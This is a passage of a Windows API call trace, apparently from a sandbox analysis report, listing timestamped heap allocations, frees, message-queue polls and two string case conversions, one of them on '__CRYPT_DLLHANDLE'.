hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0032.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0032.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0032.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0032.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0032.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.966] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0032.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2340 [0032.967] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.967] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.967] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0032.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0032.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0032.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0032.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cb0 [0032.968] CharLowerBuffW (in: lpsz="byte[86609]", cchLength=0xb | out: lpsz="byte[86609]") returned 0xb [0032.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0032.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0032.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0032.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0032.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0032.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15251) returned 0x8ba460 [0032.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cb0 | out: hHeap=0x770000) returned 1 [0032.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0032.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0032.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0032.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0032.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0032.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0032.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0032.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0032.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac350 | out: hHeap=0x770000) returned 1 [0032.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.969] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0032.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0032.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0032.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1524d) returned 0x8cf6c0 [0032.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1524d) returned 0x8e4918 [0032.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac350 | out: hHeap=0x770000) returned 1 [0032.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0032.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8cf6c0 | out: hHeap=0x770000) returned 1 [0032.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0032.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8e4918 | out: hHeap=0x770000) returned 1 [0032.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.972] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.972] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c958 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.972] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0032.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0032.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0032.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 